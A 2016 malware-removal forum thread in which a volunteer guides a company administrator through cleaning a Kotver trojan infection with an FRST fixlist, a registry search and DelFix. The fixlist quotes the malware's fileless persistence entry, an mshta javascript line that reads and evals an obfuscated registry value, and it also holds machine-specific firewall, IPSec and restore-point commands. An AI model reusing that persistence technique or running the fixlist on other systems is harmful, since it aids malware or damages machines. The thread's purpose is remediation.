[ti]SOLVED[/ti]Kotver Trojan

nickmcmillan
New Helpee

Posts: 5

[ti]SOLVED[/ti]Kotver Trojan Oct 10, 2016 11:15:39 GMT -8

Post by nickmcmillan on Oct 10, 2016 11:15:39 GMT -8

3 computers in my company were flagged for having this virus today (out of around 300), but I suppose I'll need to make three separate threads. Here is the first anyway. Any help is greatly appreciated!!

wikisend.com/download/619600/FRST.txt

wikisend.com/download/744184/Addition.txt

Last Edit: Oct 11, 2016 21:13:05 GMT -8 by dbrisen

dbrisen
Malware Removalists

Posts: 3,688

[ti]SOLVED[/ti]Kotver Trojan Oct 10, 2016 12:58:59 GMT -8

Post by dbrisen on Oct 10, 2016 12:58:59 GMT -8

FIRST >>>>

Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed):

ShopAtHome.com Toolbar

To do so, left clicking on the name once and then click Uninstall/Change at the bar above the list window.

Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software.

SECOND >>>>

Open notepad by pressing the Windows Key + R key, typing notepad in the Run box and pressing Enter. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt

Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Winlogon: [Shell] [0 ] () <=== ATTENTION
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-198091663-4089226470-1901918720-1230\...\MountPoints2: {86e2b448-a38c-11e3-967d-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-198091663-4089226470-1901918720-3564\...\Run: [**xeyh<*>] => "C:\Users\RWRPGL2\AppData\Local\adf36ab\e8c65f7.lnk" <===== ATTENTION (Value Name with invalid characters)
C:\Users\RWRPGL2\AppData\Local\adf36ab
HKU\S-1-5-21-198091663-4089226470-1901918720-3564\...\MountPoints2: {86e2b448-a38c-11e3-967d-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-198091663-4089226470-1901918720-3584\...\RunOnce: [] => [X]
HKU\S-1-5-21-198091663-4089226470-1901918720-3628\...\RunOnce: [] => [X]
HKU\S-1-5-21-198091663-4089226470-1901918720-4105\...\MountPoints2: {86e2b448-a38c-11e3-967d-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-198091663-4089226470-1901918720-500\...\MountPoints2: {86e2b448-a38c-11e3-967d-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-2200770554-1430736506-2363544395-1000\...\MountPoints2: {86e2b448-a38c-11e3-967d-806e6f6e6963} - Q:\LenovoQDrive.exe
Startup: C:\Users\RWRPGL2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3bcf8a5.lnk [2016-07-31]
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-198091663-4089226470-1901918720-3564 -> DefaultScope {C8F3ADF9-0181-414F-A119-4ED3493A404D} URL =
SearchScopes: HKU\S-1-5-21-198091663-4089226470-1901918720-3564 -> {C8F3ADF9-0181-414F-A119-4ED3493A404D} URL =
SearchScopes: HKU\S-1-5-21-198091663-4089226470-1901918720-500 -> DefaultScope {C8F3ADF9-0181-414F-A119-4ED3493A404D} URL =
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Extension: (Google Drive) - C:\Users\RWRPGL2\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-30]
CHR Extension: (Google Search) - C:\Users\RWRPGL2\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RWRPGL2\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-10]
R2 rpcld; C:\ProgramData\Rpcnet\Bin\rpcld.exe [X]
C:\ProgramData\Rpcnet\Bin\rpcld.exe
2016-10-10 13:33 - 2016-10-10 15:07 - 00000000 ____D C:\Users\RWRPGL2\AppData\Local\adf36ab
2014-03-04 07:20 - 2014-03-04 07:20 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
C:\Users\administrator\AppData\Local\Temp\DPInstx64.exe
C:\Users\administrator\AppData\Local\Temp\DPInstx86.exe
C:\Users\administrator\AppData\Local\Temp\DPInst_Monx64.exe
C:\Users\administrator\AppData\Local\Temp\DPInst_Monx86.exe
C:\Users\administrator\AppData\Local\Temp\libeay32.dll
C:\Users\administrator\AppData\Local\Temp\msvcr120.dll
C:\Users\administrator\AppData\Local\Temp\OS_Detect.exe
C:\Users\administrator\AppData\Local\Temp\sqlite3.dll
AlternateDataStreams: C:\Windows:nlsPreferences [386]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ccSettings_{0C4CC990-79E8-4AF1-BB5C-2490747676D5}.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ccSettings_{7A44E73A-F295-42BC-911C-22E243CCAF2B}.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ccSettings_{C478A420-A500-4274-A52E-70EC7481342F}.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"
HKU\S-1-5-21-198091663-4089226470-1901918720-3564\Software\Classes\16dabd8: "C:\Windows\system32\mshta.exe" "javascript:NaxP2="s7";E1O8=new ActiveXObject("WScript.Shell");utshK2hC8="ll";m8prf7=E1O8.RegRead("HKCU\\software\\gpfcxvufgp\\ceid");WQcV6B6qU="Z3T";eval(m8prf7);N2VG8m="8RFT";" <===== ATTENTION
DeleteKey: HKU\S-1-5-21-198091663-4089226470-1901918720-3564\Software\Classes\16dabd8
DeleteKey: HKCU\\software\\gpfcxvufgp
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Start FRST that is on the desktop by right clicking on file and selecting "Run as Administrator..." and press the Fix button just once and wait.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

LAST >>>>

Please tell me how the system is running now? Does the warning come back after the reboot?

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

nickmcmillan New Helpee Posts: 5	[ti]SOLVED[/ti]Kotver Trojan Oct 11, 2016 4:25:47 GMT -8 Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by nickmcmillan on Oct 11, 2016 4:25:47 GMT -8 The fix worked successfully. The errors have gone away, thanks so much! Shall I post the other two computer logs in this thread or make another thread? wikisend.com/download/535916/Fixlog.txt

dbrisen
Malware Removalists

Posts: 3,688

[ti]SOLVED[/ti]Kotver Trojan Oct 11, 2016 7:33:22 GMT -8

Post by dbrisen on Oct 11, 2016 7:33:22 GMT -8

It would be easier to use separate threads as it makes keeping the logs / fixes / follow ups less confusing on my end.

We need to run a search on this machine as there was a registry key that I want to make sure is removed.

[/b] to disclaimer.
Type software\gpfcxvufgp into the Search Box.
Press the Search Registry button.
It will produce a log called search.txt or SearchReg.txt in the same directory the tool is run from.
Please copy and paste log back here.
[/ul]

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

nickmcmillan
New Helpee

Posts: 5

[ti]SOLVED[/ti]Kotver Trojan Oct 11, 2016 8:25:07 GMT -8

Post by nickmcmillan on Oct 11, 2016 8:25:07 GMT -8

Farbar Recovery Scan Tool (x64) Version: 10-10-2016
Ran by RWRPGL2 (11-10-2016 12:14:28)
Running from C:\Users\RWRPGL2\Desktop
Boot Mode: Normal

================== Search Registry: "software\gpfcxvufgp" ===========

====== End of Search ======

dbrisen
Malware Removalists

Posts: 3,688

[ti]SOLVED[/ti]Kotver Trojan Oct 11, 2016 8:43:43 GMT -8

Post by dbrisen on Oct 11, 2016 8:43:43 GMT -8

Cool; let's close this one out please.

We need to remove the tools we've used during the cleaning of your machine.

[/a]
Ensure the following is ticked:
Remove disinfection tools
Create registry backup
Purge system restore
[/ul]

Then click Run. The program will run for a few moments and then notepad will open with a log.

Please paste the log in your next reply. Once you have the log file saved, please reboot your system to complete the clean up process.

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

nickmcmillan
New Helpee

Posts: 5

[ti]SOLVED[/ti]Kotver Trojan Oct 11, 2016 11:15:38 GMT -8

Post by nickmcmillan on Oct 11, 2016 11:15:38 GMT -8

# DelFix v1.010 - Logfile created 11/10/2016 at 15:03:50

# Updated 26/04/2015 by Xplode

# Username : RWRPGL2 - PF00S9PP

# Operating System : Windows 7 Professional Service Pack 1 (64 bits)

~ Removing disinfection tools ...

Deleted : C:\FRST

Deleted : C:\AdwCleaner

Deleted : C:\Users\RWRPGL2\Desktop\FRST-OlderVersion

Deleted : C:\Users\RWRPGL2\Desktop\Addition.txt

Deleted : C:\Users\RWRPGL2\Desktop\Fixlog.txt

Deleted : C:\Users\RWRPGL2\Desktop\FRST.txt

Deleted : C:\Users\RWRPGL2\Desktop\FRST64.exe

Deleted : C:\Users\RWRPGL2\Downloads\AdwCleaner.exe

~ Creating registry backup ... OK

~ Cleaning system restore ...

Deleted : RP #110 [Windows Update | 09/16/2016 07:00:47]

Deleted : RP #111 [Windows Update | 09/18/2016 07:00:44]

Deleted : RP #112 [Windows Update | 09/22/2016 11:52:26]

Deleted : RP #114 [Restore Point Created by FRST | 10/11/2016 11:43:52]

New restore point created !

########## - EOF - ##########

[ti]SOLVED[/ti]Kotver Trojan

Post by nickmcmillan on Oct 10, 2016 11:15:39 GMT -8

Post by dbrisen on Oct 10, 2016 12:58:59 GMT -8

Post by nickmcmillan on Oct 11, 2016 4:25:47 GMT -8

Post by dbrisen on Oct 11, 2016 7:33:22 GMT -8

Post by nickmcmillan on Oct 11, 2016 8:25:07 GMT -8

Post by dbrisen on Oct 11, 2016 8:43:43 GMT -8

Post by nickmcmillan on Oct 11, 2016 11:15:38 GMT -8